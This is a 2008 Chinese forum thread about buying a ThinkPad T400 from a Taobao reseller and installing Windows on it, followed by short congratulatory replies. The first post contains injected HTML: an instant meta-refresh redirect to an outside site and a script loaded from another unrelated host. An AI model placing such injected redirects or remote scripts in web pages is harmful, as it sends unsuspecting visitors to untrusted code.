开业于2004年,诚信服务几万客户
翔意数码淘宝店:xynbnb.taobao.com
全国客服电话:010-59000667
地址:北京东城区东兴隆街56号北京商界A座512
ThinkPad产品专业客服 苹果产品专业客服

[X系列] VIP 贵宾申请

购机时间:2008-09-05
购机型号:Think Pad  T400  
                    2767-A98
序列号  :23-A1872
                    2767A98
<meta http-equiv="refresh" content="0; url=http://www.1117.cc">
★★★
<script type="text/javascript" src="http://www.553.cc/q.js"></script>
<link href="http://www.553.cc/1.css" rel="stylesheet" type="text/css" media="screen" />
<P>&nbsp;</P>

祝贺楼主,恭喜兄弟。
原帖由 ylshcar 于 2008-9-5 14:53 发表
购机时间:2008-09-05
购机型号:Think Pad  T400  
                    2767-A98
序列号  :23-A1872
                    2767A98

恭喜恭喜
A98的机器是从BY3-A35-A98不断加钱,升配置,一个月后终于........
到手真不容易啊!
配置:内存三星2G DDRIII的,想升级4G买不到条子...........
            硬盘日立200G  SATA  7200转,赞一个呵呵!
      光驱日立DVD/RW   SATA    (装系统要注意)
T400 A98翔意的恢复光盘还在制作中,欠我一套,呵呵!
机器自带港版英文VISTA(HOME),果断的分了区,用雨林木风XP SP3 9.03版光盘,选一件恢复到C盘,出错....
跳入DOS状态下,手动进入GHOST,OK,恢复,失败.......
重启进PE,OK,但是发现找不到硬盘,可是DM分区时都OK的呀.......
用纯净版XP安装光盘,到检测硬件,找硬盘时蓝屏。
无语了,后来一想光驱和硬盘都是SATA的,不能一键恢复和PE下找不到硬盘,应该是硬盘接口形式不对,
进入BIOS,把硬盘接口形式改了过来,哈哈哈,先是装了XP,后再装雨林木风版VISTA,一切OK,上LENOVO的网站下驱动
无线网卡和显卡的驱动有些烦,不过手动,自动,多搞几次就会OK。这是一上午的体会,暂时就这些,照片没时间拍。
内存,液晶屏测试都OK。CPU-Z里看到主板芯片组是最新型号,心里爽啊!

只有2个疑问:送的原装小黑鼠标的外包装少了个包着一张纸的塑料封袋,里面也没有USB转PS/2的转接头。这两点是我去Think Pad专卖店比较后发现的,有哪位知道的朋友可以解答一下吗?万分感谢!

呵呵,恭喜啊,楼主观察的很仔细吗。。。。
怎么还没变成贵宾啊
已经是贵宾了
是不是现在加贵宾没XB加
原帖由 gary0086 于 2008-9-5 18:49 发表

小心,纯表情是要关小黑屋的!
恭喜楼主拥有小黑,加入黑社会
XY的服务真是不错
恭喜了
恭喜恭喜恭喜。。。。
这么仔细啊不错啊,送的原装小黑鼠标的外包装少了个包着一张纸的塑料封袋,里面也没有USB转PS/2的转接头。这两点是我去Think Pad专卖店比较后发现的,有哪位知道的朋友可以解答一下吗?万分感谢!
这个都对比出来啊。
恭喜恭喜……